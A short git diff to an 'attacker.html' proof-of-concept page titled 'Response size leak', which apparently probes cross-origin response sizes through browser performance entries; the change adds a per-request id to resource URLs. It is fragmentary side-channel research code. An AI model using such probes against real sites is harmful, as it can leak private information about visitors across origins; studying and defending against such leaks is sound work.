--- a/src/poc2/attacker.html
+++ b/src/poc2/attacker.html
@@ -3,7 +3,7 @@
   <head>
     <title>Response size leak</title>
     <script>
-
+      var id = 0
 
       function show(element, url, size, event, diff) {
         document.getElementById('tbody').innerHTML += `<tr><td>${element}</td><td>${url}</td><td>${size}</td><td>${event}</td><td>${diff}</td><tr>`;
@@ -12,7 +12,8 @@
       function get(element, url, size) {
         let start = performance.getEntries().length;
         let e = document.createElement(element);
-        e['src'] = `${url}?size=${size}&intercept=true`;
+        e['src'] = `${url}?size=${size}&id=${id}`;
+        id++;
 
         e.onload = () => {
           show(element, url, size, 'onload', performance.getEntries().length - start);
